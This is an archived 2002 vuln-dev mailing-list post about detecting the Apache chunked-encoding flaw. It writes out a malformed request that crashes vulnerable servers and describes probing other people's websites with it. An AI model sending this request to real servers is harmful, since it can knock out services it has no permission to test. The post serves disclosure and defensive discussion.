Apache vulnerability checking

From: Syzop (syz@dds.nl)
Date: 06/23/02


Date: Sun, 23 Jun 2002 12:00:34 +0200
From: Syzop <syz@dds.nl>
To: vuln-dev@securityfocus.com


Hi,

I've been checking sites for some time now with this
attached prog (and mailing the webmasters), what it does is send a:

--
GET /checkapache.html HTTP/1.0
Transfer-Encoding: chunked

999999999; a 0

-- request, and see what happends. Vulnerable apache: crashes, so connection is closed. Not vulnerable apache: sends something back IIS/some other things: waits for more data (?)

Anyway, I thought that when I'm sure it's an apache server ("Server: Apache blabla") and it crashes then it must be vulnerable. Is this always the case? This morning I received a mail from some admin who I had mailed and he told me they had already upgraded. Full server version: "Server: Apache/1.3.24 (Unix) (Red-Hat/Linux) mod_ssl/2.8.8 OpenSSL/0.9.6b mod_perl/1.26"

So my question is: has redhat changed something in the bad- chunked-encoding-detected-behavior in their backport or did this guy just forget to restart apache?

Btw, there are some other "major sites" which do also drop the connection but I couldn't see if they were running apache servers. www.tucows.com / www.geocities.com / www.yahoo.com / etc They do respond to "good" chunked encoding requests. Anyway I didn't mail them since it could be some weird http server behavior.

Cya,

Bram Matthys




Relevant Pages

  • Re: apache question
    ... # Based upon the NCSA server configuration files originally by Rob McCool. ... # configuration directives that give the server its instructions. ... Directives that control the operation of the Apache server process as ...
    (alt.php)
  • Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
    ... The suEXEC feature provides Apache users the ability to run CGI and SSI ... under user IDs different from the user ID of the calling web server. ... Normally php and cgi scripts are not allowed to read files with the ... because the php script is run trough suEXEC. ...
    (Full-Disclosure)
  • Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
    ... The suEXEC feature provides Apache users the ability to run CGI and SSI ... under user IDs different from the user ID of the calling web server. ... Normally php and cgi scripts are not allowed to read files with the ... because the php script is run trough suEXEC. ...
    (Bugtraq)
  • Re: HTTP servers on z/OS
    ... developed by the Apache Software Foundation. ... Also know as IHS ... "...the current IBM HTTP Server for z/OS and IHS for z/OS Powered by Apache, ...
    (bit.listserv.ibm-main)
  • Re: Apache and SSL
    ... # Based upon the NCSA server configuration files originally by Rob McCool. ... # This is the main Apache server configuration file. ... # configuration directives that give the server its instructions. ...
    (RedHat)